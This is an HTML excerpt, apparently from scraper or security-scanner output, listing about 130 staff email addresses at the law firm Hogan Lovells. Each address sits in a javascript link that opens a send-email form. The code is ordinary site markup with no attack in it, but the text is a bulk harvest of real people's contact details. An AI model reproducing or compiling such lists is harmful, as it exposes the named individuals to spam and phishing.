<a href="javascript:window.open('/email/SendEmailForm.aspx?Email=stefan.schuppert@hoganlovells.com', 'winEmail53', 'width=450,height=340,scrollbars');void(0);">
                                    stefan.schuppert@hoganlovells.com</a>
...[SNIP]...
<a href="javascript:window.open('/email/SendEmailForm.aspx?Email=douglas.schwab@hoganlovells.com', 'winEmail53', 'width=450,height=340,scrollbars');void(0);">
                                    douglas.schwab@hoganlovells.com</a>
...[SNIP]...
<a href="javascript:window.open('/email/SendEmailForm.aspx?Email=sebastian.schwalme@hoganlovells.com', 'winEmail53', 'width=450,height=340,scrollbars');void(0);">
                                    sebastian.schwalme@hoganlovells.com</a>
...[SNIP]...
<a href="javascript:window.open('/email/SendEmailForm.aspx?Email=eckard.schwarz@hoganlovells.com', 'winEmail53', 'width=450,height=340,scrollbars');void(0);">
                                    eckard.schwarz@hoganlovells.com</a>
...[SNIP]...
<a href="javascript:window.open('/email/SendEmailForm.aspx?Email=marc.schweda@hoganlovells.com', 'winEmail53', 'width=450,height=340,scrollbars');void(0);">
                                    marc.schweda@hoganlovells.com</a>
...[SNIP]...
<a href="javascript:window.open('/email/SendEmailForm.aspx?Email=angelika.schwetzler@hoganlovells.com', 'winEmail53', 'width=450,height=340,scrollbars');void(0);">
                                    angelika.schwetzler@hoganlovells.com</a>
...[SNIP]...
<a href="javascript:window.open('/email/SendEmailForm.aspx?Email=alex.sciannaca@hoganlovells.com', 'winEmail53', 'width=450,height=340,scrollbars');void(0);">
                                    alex.sciannaca@hoganlovells.com</a>
...[SNIP]...
<a href="javascript:window.open('/email/SendEmailForm.aspx?Email=david.scott@hoganlovells.com', 'winEmail53', 'width=450,height=340,scrollbars');void(0);">
                                    david.scott@hoganlovells.com</a>
...[SNIP]...
<a href="javascript:window.open('/email/SendEmailForm.aspx?Email=dan.screene@hoganlovells.com', 'winEmail53', 'width=450,height=340,scrollbars');void(0);">
                                    dan.screene@hoganlovells.com</a>
...[SNIP]...
<a href="javascript:window.open('/email/SendEmailForm.aspx?Email=jane.seager@hoganlovells.com', 'winEmail53', 'width=450,height=340,scrollbars');void(0);">
                                    jane.seager@hoganlovells.com</a>
...[SNIP]...
<a href="javascript:window.open('/email/SendEmailForm.aspx?Email=nathan.searle@hoganlovells.com', 'winEmail53', 'width=450,height=340,scrollbars');void(0);">
                                    nathan.searle@hoganlovells.com</a>
...[SNIP]...
<a href="javascript:window.open('/email/SendEmailForm.aspx?Email=oliver.searle@hoganlovells.com', 'winEmail53', 'width=450,height=340,scrollbars');void(0);">
                                    oliver.searle@hoganlovells.com</a>
...[SNIP]...
<a href="javascript:window.open('/email/SendEmailForm.aspx?Email=esther.sebastian@hoganlovells.com', 'winEmail53', 'width=450,height=340,scrollbars');void(0);">
                                    esther.sebastian@hoganlovells.com</a>
...[SNIP]...
<a href="javascript:window.open('/email/SendEmailForm.aspx?Email=martin.seda@hoganlovells.com', 'winEmail53', 'width=450,height=340,scrollbars');void(0);">
                                    martin.seda@hoganlovells.com</a>
...[SNIP]...
<a href="javascript:window.open('/email/SendEmailForm.aspx?Email=randy.segal@hoganlovells.com', 'winEmail53', 'width=450,height=340,scrollbars');void(0);">
                                    randy.segal@hoganlovells.com</a>
...[SNIP]...
<a href="javascript:window.open('/email/SendEmailForm.aspx?Email=julian.seiguer@hoganlovells.com', 'winEmail53', 'width=450,height=340,scrollbars');void(0);">
                                    julian.seiguer@hoganlovells.com</a>
...[SNIP]...
<a href="javascript:window.open('/email/SendEmailForm.aspx?Email=andrew.sein@hoganlovells.com', 'winEmail53', 'width=450,height=340,scrollbars');void(0);">
                                    andrew.sein@hoganlovells.com</a>
...[SNIP]...
<a href="javascript:window.open('/email/SendEmailForm.aspx?Email=gary.serbin@hoganlovells.com', 'winEmail53', 'width=450,height=340,scrollbars');void(0);">
                                    gary.serbin@hoganlovells.com</a>
...[SNIP]...
<a href="javascript:window.open('/email/SendEmailForm.aspx?Email=aravinda.seshadri@hoganlovells.com', 'winEmail53', 'width=450,height=340,scrollbars');void(0);">
                                    aravinda.seshadri@hoganlovells.com</a>
...[SNIP]...
<a href="javascript:window.open('/email/SendEmailForm.aspx?Email=michael.seymour@hoganlovells.com', 'winEmail53', 'width=450,height=340,scrollbars');void(0);">
                                    michael.seymour@hoganlovells.com</a>
...[SNIP]...
<a href="javascript:window.open('/email/SendEmailForm.aspx?Email=william.seymour@hoganlovells.com', 'winEmail53', 'width=450,height=340,scrollbars');void(0);">
                                    william.seymour@hoganlovells.com</a>
...[SNIP]...
<a href="javascript:window.open('/email/SendEmailForm.aspx?Email=ryan.shadrickwilson@hoganlovells.com', 'winEmail53', 'width=450,height=340,scrollbars');void(0);">
                                    ryan.shadrickwilson@hoganlovells.com</a>
...[SNIP]...
<a href="javascript:window.open('/email/SendEmailForm.aspx?Email=Imtiaz.Shah@hoganlovells.com', 'winEmail53', 'width=450,height=340,scrollbars');void(0);">
                                    Imtiaz.Shah@hoganlovells.com</a>
...[SNIP]...
<a href="javascript:window.open('/email/SendEmailForm.aspx?Email=rustum.shah@hoganlovells.com', 'winEmail53', 'width=450,height=340,scrollbars');void(0);">
                                    rustum.shah@hoganlovells.com</a>
...[SNIP]...
<a href="javascript:window.open('/email/SendEmailForm.aspx?Email=shrina.shah@hoganlovells.com', 'winEmail53', 'width=450,height=340,scrollbars');void(0);">
                                    shrina.shah@hoganlovells.com</a>
...[SNIP]...
<a href="javascript:window.open('/email/SendEmailForm.aspx?Email=jeff.shane@hoganlovells.com', 'winEmail53', 'width=450,height=340,scrollbars');void(0);">
                                    jeff.shane@hoganlovells.com</a>
...[SNIP]...
<a href="javascript:window.open('/email/SendEmailForm.aspx?Email=hannah.sharp@hoganlovells.com', 'winEmail53', 'width=450,height=340,scrollbars');void(0);">
                                    hannah.sharp@hoganlovells.com</a>
...[SNIP]...
<a href="javascript:window.open('/email/SendEmailForm.aspx?Email=alastair.shaw@hoganlovells.com', 'winEmail53', 'width=450,height=340,scrollbars');void(0);">
                                    alastair.shaw@hoganlovells.com</a>
...[SNIP]...
<a href="javascript:window.open('/email/SendEmailForm.aspx?Email=anna.shaw@hoganlovells.com', 'winEmail53', 'width=450,height=340,scrollbars');void(0);">
                                    anna.shaw@hoganlovells.com</a>
...[SNIP]...
<a href="javascript:window.open('/email/SendEmailForm.aspx?Email=kevin.shaw@hoganlovells.com', 'winEmail53', 'width=450,height=340,scrollbars');void(0);">
                                    kevin.shaw@hoganlovells.com</a>
...[SNIP]...
<a href="javascript:window.open('/email/SendEmailForm.aspx?Email=dan.shea@hoganlovells.com', 'winEmail53', 'width=450,height=340,scrollbars');void(0);">
                                    dan.shea@hoganlovells.com</a>
...[SNIP]...
<a href="javascript:window.open('/email/SendEmailForm.aspx?Email=randy.shefman@hoganlovells.com', 'winEmail53', 'width=450,height=340,scrollbars');void(0);">
                                    randy.shefman@hoganlovells.com</a>
...[SNIP]...
<a href="javascript:window.open('/email/SendEmailForm.aspx?Email=ira.sheinfeld@hoganlovells.com', 'winEmail53', 'width=450,height=340,scrollbars');void(0);">
                                    ira.sheinfeld@hoganlovells.com</a>
...[SNIP]...
<a href="javascript:window.open('/email/SendEmailForm.aspx?Email=julie.shepard@hoganlovells.com', 'winEmail53', 'width=450,height=340,scrollbars');void(0);">
                                    julie.shepard@hoganlovells.com</a>
...[SNIP]...
<a href="javascript:window.open('/email/SendEmailForm.aspx?Email=michael.shepard@hoganlovells.com', 'winEmail53', 'width=450,height=340,scrollbars');void(0);">
                                    michael.shepard@hoganlovells.com</a>
...[SNIP]...
<a href="javascript:window.open('/email/SendEmailForm.aspx?Email=nathan.sherlock@hoganlovells.com', 'winEmail53', 'width=450,height=340,scrollbars');void(0);">
                                    nathan.sherlock@hoganlovells.com</a>
...[SNIP]...
<a href="javascript:window.open('/email/SendEmailForm.aspx?Email=patrick.sherrington@hoganlovells.com', 'winEmail53', 'width=450,height=340,scrollbars');void(0);">
                                    patrick.sherrington@hoganlovells.com</a>
...[SNIP]...
<a href="javascript:window.open('/email/SendEmailForm.aspx?Email=olga.shestakova@hoganlovells.com', 'winEmail53', 'width=450,height=340,scrollbars');void(0);">
                                    olga.shestakova@hoganlovells.com</a>
...[SNIP]...
<a href="javascript:window.open('/email/SendEmailForm.aspx?Email=gulley.shimeld@hoganlovells.com', 'winEmail53', 'width=450,height=340,scrollbars');void(0);">
                                    gulley.shimeld@hoganlovells.com</a>
...[SNIP]...
<a href="javascript:window.open('/email/SendEmailForm.aspx?Email=ivan.shiu@hoganlovells.com', 'winEmail53', 'width=450,height=340,scrollbars');void(0);">
                                    ivan.shiu@hoganlovells.com</a>
...[SNIP]...
<a href="javascript:window.open('/email/SendEmailForm.aspx?Email=alexei.shmelev@hoganlovells.com', 'winEmail53', 'width=450,height=340,scrollbars');void(0);">
                                    alexei.shmelev@hoganlovells.com</a>
...[SNIP]...
<a href="javascript:window.open('/email/SendEmailForm.aspx?Email=robert.shoesmith@hoganlovells.com', 'winEmail53', 'width=450,height=340,scrollbars');void(0);">
                                    robert.shoesmith@hoganlovells.com</a>
...[SNIP]...
<a href="javascript:window.open('/email/SendEmailForm.aspx?Email=paul.shoning@hoganlovells.com', 'winEmail53', 'width=450,height=340,scrollbars');void(0);">
                                    paul.shoning@hoganlovells.com</a>
...[SNIP]...
<a href="javascript:window.open('/email/SendEmailForm.aspx?Email=james.showen@hoganlovells.com', 'winEmail53', 'width=450,height=340,scrollbars');void(0);">
                                    james.showen@hoganlovells.com</a>
...[SNIP]...
<a href="javascript:window.open('/email/SendEmailForm.aspx?Email=ramsey.shubbar@hoganlovells.com', 'winEmail53', 'width=450,height=340,scrollbars');void(0);">
                                    ramsey.shubbar@hoganlovells.com</a>
...[SNIP]...
<a href="javascript:window.open('/email/SendEmailForm.aspx?Email=waajid.siddiqui@hoganlovells.com', 'winEmail53', 'width=450,height=340,scrollbars');void(0);">
                                    waajid.siddiqui@hoganlovells.com</a>
...[SNIP]...
<a href="javascript:window.open('/email/SendEmailForm.aspx?Email=adam.siegel@hoganlovells.com', 'winEmail53', 'width=450,height=340,scrollbars');void(0);">
                                    adam.siegel@hoganlovells.com</a>
...[SNIP]...
<a href="javascript:window.open('/email/SendEmailForm.aspx?Email=bahne.sievers@hoganlovells.com', 'winEmail53', 'width=450,height=340,scrollbars');void(0);">
                                    bahne.sievers@hoganlovells.com</a>
...[SNIP]...
<a href="javascript:window.open('/email/SendEmailForm.aspx?Email=adam.silver@hoganlovells.com', 'winEmail53', 'width=450,height=340,scrollbars');void(0);">
                                    adam.silver@hoganlovells.com</a>
...[SNIP]...
<a href="javascript:window.open('/email/SendEmailForm.aspx?Email=howard.silver@hoganlovells.com', 'winEmail53', 'width=450,height=340,scrollbars');void(0);">
                                    howard.silver@hoganlovells.com</a>
...[SNIP]...
<a href="javascript:window.open('/email/SendEmailForm.aspx?Email=michael.silver@hoganlovells.com', 'winEmail53', 'width=450,height=340,scrollbars');void(0);">
                                    michael.silver@hoganlovells.com</a>
...[SNIP]...
<a href="javascript:window.open('/email/SendEmailForm.aspx?Email=richard.silverman@hoganlovells.com', 'winEmail53', 'width=450,height=340,scrollbars');void(0);">
                                    richard.silverman@hoganlovells.com</a>
...[SNIP]...
<a href="javascript:window.open('/email/SendEmailForm.aspx?Email=kristiana.simeonova-schuldes@hoganlovells.com', 'winEmail53', 'width=450,height=340,scrollbars');void(0);">
                                    kristiana.simeonova-schuldes@hoganlovells.com</a>
...[SNIP]...
<a href="javascript:window.open('/email/SendEmailForm.aspx?Email=christopher.simmonds@hoganlovells.com', 'winEmail53', 'width=450,height=340,scrollbars');void(0);">
                                    christopher.simmonds@hoganlovells.com</a>
...[SNIP]...
<a href="javascript:window.open('/email/SendEmailForm.aspx?Email=giusj.simone@hoganlovells.com', 'winEmail53', 'width=450,height=340,scrollbars');void(0);">
                                    giusj.simone@hoganlovells.com</a>
...[SNIP]...
<a href="javascript:window.open('/email/SendEmailForm.aspx?Email=alessandra.simons@hoganlovells.com', 'winEmail53', 'width=450,height=340,scrollbars');void(0);">
                                    alessandra.simons@hoganlovells.com</a>
...[SNIP]...
<a href="javascript:window.open('/email/SendEmailForm.aspx?Email=kyle.simpson@hoganlovells.com', 'winEmail53', 'width=450,height=340,scrollbars');void(0);">
                                    kyle.simpson@hoganlovells.com</a>
...[SNIP]...
<a href="javascript:window.open('/email/SendEmailForm.aspx?Email=guy.simpson@hoganlovells.com', 'winEmail53', 'width=450,height=340,scrollbars');void(0);">
                                    guy.simpson@hoganlovells.com</a>
...[SNIP]...
<a href="javascript:window.open('/email/SendEmailForm.aspx?Email=greg.sinfield@hoganlovells.com', 'winEmail53', 'width=450,height=340,scrollbars');void(0);">
                                    greg.sinfield@hoganlovells.com</a>
...[SNIP]...
<a href="javascript:window.open('/email/SendEmailForm.aspx?Email=david.singer@hoganlovells.com', 'winEmail53', 'width=450,height=340,scrollbars');void(0);">
                                    david.singer@hoganlovells.com</a>
...[SNIP]...
<a href="javascript:window.open('/email/SendEmailForm.aspx?Email=brent.singley@hoganlovells.com', 'winEmail53', 'width=450,height=340,scrollbars');void(0);">
                                    brent.singley@hoganlovells.com</a>
...[SNIP]...
<a href="javascript:window.open('/email/SendEmailForm.aspx?Email=michael.sinhart@hoganlovells.com', 'winEmail53', 'width=450,height=340,scrollbars');void(0);">
                                    michael.sinhart@hoganlovells.com</a>
...[SNIP]...
<a href="javascript:window.open('/email/SendEmailForm.aspx?Email=natalie.sinicrope@hoganlovells.com', 'winEmail53', 'width=450,height=340,scrollbars');void(0);">
                                    natalie.sinicrope@hoganlovells.com</a>
...[SNIP]...
<a href="javascript:window.open('/email/SendEmailForm.aspx?Email=david.skaar@hoganlovells.com', 'winEmail53', 'width=450,height=340,scrollbars');void(0);">
                                    david.skaar@hoganlovells.com</a>
...[SNIP]...
<a href="javascript:window.open('/email/SendEmailForm.aspx?Email=paul.skelly@hoganlovells.com', 'winEmail53', 'width=450,height=340,scrollbars');void(0);">
                                    paul.skelly@hoganlovells.com</a>
...[SNIP]...
<a href="javascript:window.open('/email/SendEmailForm.aspx?Email=andrew.skipper@hoganlovells.com', 'winEmail53', 'width=450,height=340,scrollbars');void(0);">
                                    andrew.skipper@hoganlovells.com</a>
...[SNIP]...
<a href="javascript:window.open('/email/SendEmailForm.aspx?Email=pavel.skopovy@hoganlovells.com', 'winEmail53', 'width=450,height=340,scrollbars');void(0);">
                                    pavel.skopovy@hoganlovells.com</a>
...[SNIP]...
<a href="javascript:window.open('/email/SendEmailForm.aspx?Email=jonathan.skowron@hoganlovells.com', 'winEmail53', 'width=450,height=340,scrollbars');void(0);">
                                    jonathan.skowron@hoganlovells.com</a>
...[SNIP]...
<a href="javascript:window.open('/email/SendEmailForm.aspx?Email=russell.slanover@hoganlovells.com', 'winEmail53', 'width=450,height=340,scrollbars');void(0);">
                                    russell.slanover@hoganlovells.com</a>
...[SNIP]...
<a href="javascript:window.open('/email/SendEmailForm.aspx?Email=elizabeth.slattery@hoganlovells.com', 'winEmail53', 'width=450,height=340,scrollbars');void(0);">
                                    elizabeth.slattery@hoganlovells.com</a>
...[SNIP]...
<a href="javascript:window.open('/email/SendEmailForm.aspx?Email=edward.sledge@hoganlovells.com', 'winEmail53', 'width=450,height=340,scrollbars');void(0);">
                                    edward.sledge@hoganlovells.com</a>
...[SNIP]...
<a href="javascript:window.open('/email/SendEmailForm.aspx?Email=ewa.slezak@hoganlovells.com', 'winEmail53', 'width=450,height=340,scrollbars');void(0);">
                                    ewa.slezak@hoganlovells.com</a>
...[SNIP]...
<a href="javascript:window.open('/email/SendEmailForm.aspx?Email=david.slotkin@hoganlovells.com', 'winEmail53', 'width=450,height=340,scrollbars');void(0);">
                                    david.slotkin@hoganlovells.com</a>
...[SNIP]...
<a href="javascript:window.open('/email/SendEmailForm.aspx?Email=dmitry.smirnov@hoganlovells.com', 'winEmail53', 'width=450,height=340,scrollbars');void(0);">
                                    dmitry.smirnov@hoganlovells.com</a>
...[SNIP]...
<a href="javascript:window.open('/email/SendEmailForm.aspx?Email=clare.smith@hoganlovells.com', 'winEmail53', 'width=450,height=340,scrollbars');void(0);">
                                    clare.smith@hoganlovells.com</a>
...[SNIP]...
<a href="javascript:window.open('/email/SendEmailForm.aspx?Email=craig.smith@hoganlovells.com', 'winEmail53', 'width=450,height=340,scrollbars');void(0);">
                                    craig.smith@hoganlovells.com</a>
...[SNIP]...
<a href="javascript:window.open('/email/SendEmailForm.aspx?Email=joanna.smith@hoganlovells.com', 'winEmail53', 'width=450,height=340,scrollbars');void(0);">
                                    joanna.smith@hoganlovells.com</a>
...[SNIP]...
<a href="javascript:window.open('/email/SendEmailForm.aspx?Email=john.smith@hoganlovells.com', 'winEmail53', 'width=450,height=340,scrollbars');void(0);">
                                    john.smith@hoganlovells.com</a>
...[SNIP]...
<a href="javascript:window.open('/email/SendEmailForm.aspx?Email=kathryn.smith@hoganlovells.com', 'winEmail53', 'width=450,height=340,scrollbars');void(0);">
                                    kathryn.smith@hoganlovells.com</a>
...[SNIP]...
<a href="javascript:window.open('/email/SendEmailForm.aspx?Email=michael.m.smith@hoganlovells.com', 'winEmail53', 'width=450,height=340,scrollbars');void(0);">
                                    michael.m.smith@hoganlovells.com</a>
...[SNIP]...
<a href="javascript:window.open('/email/SendEmailForm.aspx?Email=robert.smith@hoganlovells.com', 'winEmail53', 'width=450,height=340,scrollbars');void(0);">
                                    robert.smith@hoganlovells.com</a>
...[SNIP]...
<a href="javascript:window.open('/email/SendEmailForm.aspx?Email=thomas.smith@hoganlovells.com', 'winEmail53', 'width=450,height=340,scrollbars');void(0);">
                                    thomas.smith@hoganlovells.com</a>
...[SNIP]...
<a href="javascript:window.open('/email/SendEmailForm.aspx?Email=john.smolen@hoganlovells.com', 'winEmail53', 'width=450,height=340,scrollbars');void(0);">
                                    john.smolen@hoganlovells.com</a>
...[SNIP]...
<a href="javascript:window.open('/email/SendEmailForm.aspx?Email=stephen.smyers@hoganlovells.com', 'winEmail53', 'width=450,height=340,scrollbars');void(0);">
                                    stephen.smyers@hoganlovells.com</a>
...[SNIP]...
<a href="javascript:window.open('/email/SendEmailForm.aspx?Email=jan.desnaijer@hoganlovells.com', 'winEmail53', 'width=450,height=340,scrollbars');void(0);">
                                    jan.desnaijer@hoganlovells.com</a>
...[SNIP]...
<a href="javascript:window.open('/email/SendEmailForm.aspx?Email=maree.sneed@hoganlovells.com', 'winEmail53', 'width=450,height=340,scrollbars');void(0);">
                                    maree.sneed@hoganlovells.com</a>
...[SNIP]...
<a href="javascript:window.open('/email/SendEmailForm.aspx?Email=damon.so@hoganlovells.com', 'winEmail53', 'width=450,height=340,scrollbars');void(0);">
                                    damon.so@hoganlovells.com</a>
...[SNIP]...
<a href="javascript:window.open('/email/SendEmailForm.aspx?Email=peter.so@hoganlovells.com', 'winEmail53', 'width=450,height=340,scrollbars');void(0);">
                                    peter.so@hoganlovells.com</a>
...[SNIP]...
<a href="javascript:window.open('/email/SendEmailForm.aspx?Email=antje.soeder@hoganlovells.com', 'winEmail53', 'width=450,height=340,scrollbars');void(0);">
                                    antje.soeder@hoganlovells.com</a>
...[SNIP]...
<a href="javascript:window.open('/email/SendEmailForm.aspx?Email=clayton.solomon@hoganlovells.com', 'winEmail53', 'width=450,height=340,scrollbars');void(0);">
                                    clayton.solomon@hoganlovells.com</a>
...[SNIP]...
<a href="javascript:window.open('/email/SendEmailForm.aspx?Email=daniel.solove@hoganlovells.com', 'winEmail53', 'width=450,height=340,scrollbars');void(0);">
                                    daniel.solove@hoganlovells.com</a>
...[SNIP]...
<a href="javascript:window.open('/email/SendEmailForm.aspx?Email=adam.solowsky@hoganlovells.com', 'winEmail53', 'width=450,height=340,scrollbars');void(0);">
                                    adam.solowsky@hoganlovells.com</a>
...[SNIP]...
<a href="javascript:window.open('/email/SendEmailForm.aspx?Email=christopher.somorjay@hoganlovells.com', 'winEmail53', 'width=450,height=340,scrollbars');void(0);">
                                    christopher.somorjay@hoganlovells.com</a>
...[SNIP]...
<a href="javascript:window.open('/email/SendEmailForm.aspx?Email=jay.song@hoganlovells.com', 'winEmail53', 'width=450,height=340,scrollbars');void(0);">
                                    jay.song@hoganlovells.com</a>
...[SNIP]...
<a href="javascript:window.open('/email/SendEmailForm.aspx?Email=lorraine.sostowski@hoganlovells.com', 'winEmail53', 'width=450,height=340,scrollbars');void(0);">
                                    lorraine.sostowski@hoganlovells.com</a>
...[SNIP]...
<a href="javascript:window.open('/email/SendEmailForm.aspx?Email=claire.southern@hoganlovells.com', 'winEmail53', 'width=450,height=340,scrollbars');void(0);">
                                    claire.southern@hoganlovells.com</a>
...[SNIP]...
<a href="javascript:window.open('/email/SendEmailForm.aspx?Email=olesya.spandau@hoganlovells.com', 'winEmail53', 'width=450,height=340,scrollbars');void(0);">
                                    olesya.spandau@hoganlovells.com</a>
...[SNIP]...
<a href="javascript:window.open('/email/SendEmailForm.aspx?Email=frank.spano@hoganlovells.com', 'winEmail53', 'width=450,height=340,scrollbars');void(0);">
                                    frank.spano@hoganlovells.com</a>
...[SNIP]...
<a href="javascript:window.open('/email/SendEmailForm.aspx?Email=jane.sparkes@hoganlovells.com', 'winEmail53', 'width=450,height=340,scrollbars');void(0);">
                                    jane.sparkes@hoganlovells.com</a>
...[SNIP]...
<a href="javascript:window.open('/email/SendEmailForm.aspx?Email=andrew.spence@hoganlovells.com', 'winEmail53', 'width=450,height=340,scrollbars');void(0);">
                                    andrew.spence@hoganlovells.com</a>
...[SNIP]...
<a href="javascript:window.open('/email/SendEmailForm.aspx?Email=robin.spencer@hoganlovells.com', 'winEmail53', 'width=450,height=340,scrollbars');void(0);">
                                    robin.spencer@hoganlovells.com</a>
...[SNIP]...
<a href="javascript:window.open('/email/SendEmailForm.aspx?Email=andy.spielman@hoganlovells.com', 'winEmail53', 'width=450,height=340,scrollbars');void(0);">
                                    andy.spielman@hoganlovells.com</a>
...[SNIP]...
<a href="javascript:window.open('/email/SendEmailForm.aspx?Email=nicoletta.spinaci@hoganlovells.com', 'winEmail53', 'width=450,height=340,scrollbars');void(0);">
                                    nicoletta.spinaci@hoganlovells.com</a>
...[SNIP]...
<a href="javascript:window.open('/email/SendEmailForm.aspx?Email=aude.spinasse@hoganlovells.com', 'winEmail53', 'width=450,height=340,scrollbars');void(0);">
                                    aude.spinasse@hoganlovells.com</a>
...[SNIP]...
<a href="javascript:window.open('/email/SendEmailForm.aspx?Email=peter.spivack@hoganlovells.com', 'winEmail53', 'width=450,height=340,scrollbars');void(0);">
                                    peter.spivack@hoganlovells.com</a>
...[SNIP]...
<a href="javascript:window.open('/email/SendEmailForm.aspx?Email=carsten.sprenger@hoganlovells.com', 'winEmail53', 'width=450,height=340,scrollbars');void(0);">
                                    carsten.sprenger@hoganlovells.com</a>
...[SNIP]...
<a href="javascript:window.open('/email/SendEmailForm.aspx?Email=harry.spurr@hoganlovells.com', 'winEmail53', 'width=450,height=340,scrollbars');void(0);">
                                    harry.spurr@hoganlovells.com</a>
...[SNIP]...
<a href="javascript:window.open('/email/SendEmailForm.aspx?Email=effie.spyropoulos@hoganlovells.com', 'winEmail53', 'width=450,height=340,scrollbars');void(0);">
                                    effie.spyropoulos@hoganlovells.com</a>
...[SNIP]...
<a href="javascript:window.open('/email/SendEmailForm.aspx?Email=lee.squires@hoganlovells.com', 'winEmail53', 'width=450,height=340,scrollbars');void(0);">
                                    lee.squires@hoganlovells.com</a>
...[SNIP]...
<a href="javascript:window.open('/email/SendEmailForm.aspx?Email=rachel.squires@hoganlovells.com', 'winEmail53', 'width=450,height=340,scrollbars');void(0);">
                                    rachel.squires@hoganlovells.com</a>
...[SNIP]...
<a href="javascript:window.open('/email/SendEmailForm.aspx?Email=holger.stabenau@hoganlovells.com', 'winEmail53', 'width=450,height=340,scrollbars');void(0);">
                                    holger.stabenau@hoganlovells.com</a>
...[SNIP]...
<a href="javascript:window.open('/email/SendEmailForm.aspx?Email=ingrid.stables@hoganlovells.com', 'winEmail53', 'width=450,height=340,scrollbars');void(0);">
                                    ingrid.stables@hoganlovells.com</a>
...[SNIP]...
<a href="javascript:window.open('/email/SendEmailForm.aspx?Email=marta.staccioli@hoganlovells.com', 'winEmail53', 'width=450,height=340,scrollbars');void(0);">
                                    marta.staccioli@hoganlovells.com</a>
...[SNIP]...
<a href="javascript:window.open('/email/SendEmailForm.aspx?Email=julie.stanbrook@hoganlovells.com', 'winEmail53', 'width=450,height=340,scrollbars');void(0);">
                                    julie.stanbrook@hoganlovells.com</a>
...[SNIP]...
<a href="javascript:window.open('/email/SendEmailForm.aspx?Email=michael.stancombe@hoganlovells.com', 'winEmail53', 'width=450,height=340,scrollbars');void(0);">
                                    michael.stancombe@hoganlovells.com</a>
...[SNIP]...
<a href="javascript:window.open('/email/SendEmailForm.aspx?Email=carrie.stanley@hoganlovells.com', 'winEmail53', 'width=450,height=340,scrollbars');void(0);">
                                    carrie.stanley@hoganlovells.com</a>
...[SNIP]...
<a href="javascript:window.open('/email/SendEmailForm.aspx?Email=john.stanton@hoganlovells.com', 'winEmail53', 'width=450,height=340,scrollbars');void(0);">
                                    john.stanton@hoganlovells.com</a>
...[SNIP]...
<a href="javascript:window.open('/email/SendEmailForm.aspx?Email=eric.statman@hoganlovells.com', 'winEmail53', 'width=450,height=340,scrollbars');void(0);">
                                    eric.statman@hoganlovells.com</a>
...[SNIP]...
<a href="javascript:window.open('/email/SendEmailForm.aspx?Email=deborah.staudinger@hoganlovells.com', 'winEmail53', 'width=450,height=340,scrollbars');void(0);">
                                    deborah.staudinger@hoganlovells.com</a>
...[SNIP]...
<a href="javascript:window.open('/email/SendEmailForm.aspx?Email=nicholas.stavlas@hoganlovells.com', 'winEmail53', 'width=450,height=340,scrollbars');void(0);">
                                    nicholas.stavlas@hoganlovells.com</a>
...[SNIP]...
<a href="javascript:window.open('/email/SendEmailForm.aspx?Email=gemma.steel@hoganlovells.com', 'winEmail53', 'width=450,height=340,scrollbars');void(0);">
                                    gemma.steel@hoganlovells.com</a>
...[SNIP]...
<a href="javascript:window.open('/email/SendEmailForm.aspx?Email=jeremy.stein@hoganlovells.com', 'winEmail53', 'width=450,height=340,scrollbars');void(0);">
                                    jeremy.stein@hoganlovells.com</a>
...[SNIP]...
<a href="javascript:window.open('/email/SendEmailForm.aspx?Email=stuart.stein@hoganlovells.com', 'winEmail53', 'width=450,height=340,scrollbars');void(0);">
                                    stuart.stein@hoganlovells.com</a>
...[SNIP]...
<a href="javascript:window.open('/email/SendEmailForm.aspx?Email=steven.steinborn@hoganlovells.com', 'winEmail53', 'width=450,height=340,scrollbars');void(0);">
                                    steven.steinborn@hoganlovells.com</a>
...[SNIP]...
<a href="javascript:window.open('/email/SendEmailForm.aspx?Email=steffen.steininger@hoganlovells.com', 'winEmail53', 'width=450,height=340,scrollbars');void(0);">
                                    steffen.steininger@hoganlovells.com</a>
...[SNIP]...
<a href="javascript:window.open('/email/SendEmailForm.aspx?Email=daniel.stenger@hoganlovells.com', 'winEmail53', 'width=450,height=340,scrollbars');void(0);">
                                    daniel.stenger@hoganlovells.com</a>
...[SNIP]...
<a href="javascript:window.open('/email/SendEmailForm.aspx?Email=ekaterina.stepanischeva@hoganlovells.com', 'winEmail53', 'width=450,height=340,scrollbars');void(0);">
                                    ekaterina.stepanischeva@hoganlovells.com</a>
...[SNIP]...
<a href="javascript:window.open('/email/SendEmailForm.aspx?Email=oscar.stephens@hoganlovells.com', 'winEmail53', 'width=450,height=340,scrollbars');void(0);">
                                    oscar.stephens@hoganlovells.com</a>
...[SNIP]...
<a href="javascript:window.open('/email/SendEmailForm.aspx?Email=mark.sterling@hoganlovells.com', 'winEmail53', 'width=450,height=340,scrollbars');void(0);">
                                    mark.sterling@hoganlovells.com</a>
...[SNIP]...
<a href="javascript:window.open('/email/SendEmailForm.aspx?Email=cate.stetson@hoganlovells.com', 'winEmail53', 'width=450,height=340,scrollbars');void(0);">
                                    cate.stetson@hoganlovells.com</a>
...[SNIP]...
<a href="javascript:window.open('/email/SendEmailForm.aspx?Email=christian.steudtner@hoganlovells.com', 'winEmail53', 'width=450,height=340,scrollbars');void(0);">
                                    christian.steudtner@hoganlovells.com</a>
...[SNIP]...
<a href="javascript:window.open('/email/SendEmailForm.aspx?Email=joanne.steven@hoganlovells.com', 'winEmail53', 'width=450,height=340,scrollbars');void(0);">
                                    joanne.steven@hoganlovells.com</a>
...[SNIP]...
<a href="javascript:window.open('/email/SendEmailForm.aspx?Email=michael.stewart@hoganlovells.com', 'winEmail53', 'width=450,height=340,scrollbars');void(0);">
                                    michael.stewart@hoganlovells.com</a>
...[SNIP]...
<a href="javascript:window.open('/email/SendEmailForm.aspx?Email=sarah.stewart@hoganlovells.com', 'winEmail53', 'width=450,height=340,scrollbars');void(0);">
                                    sarah.stewart@hoganlovells.com</a>
...[SNIP]...
<a href="javascript:window.open('/email/SendEmailForm.aspx?Email=shelita.stewart@hoganlovells.com', 'winEmail53', 'width=450,height=340,scrollbars');void(0);">
                                    shelita.stewart@hoganlovells.com</a>
...[SNIP]...
<a href="javascript:window.open('/email/SendEmailForm.aspx?Email=walter.stillwell@hoganlovells.com', 'winEmail53', 'width=450,height=340,scrollbars');void(0);">
                                    walter.stillwell@hoganlovells.com</a>
...[SNIP]...
<a href="javascript:window.open('/email/SendEmailForm.aspx?Email=eric.stock@hoganlovells.com', 'winEmail53', 'width=450,height=340,scrollbars');void(0);">
                                    eric.stock@hoganlovells.com</a>
...[SNIP]...
<a href="javascript:window.open('/email/SendEmailForm.aspx?Email=james.stockwell@hoganlovells.com', 'winEmail53', 'width=450,height=340,scrollbars');void(0);">
                                    james.stockwell@hoganlovells.com</a>
...[SNIP]...
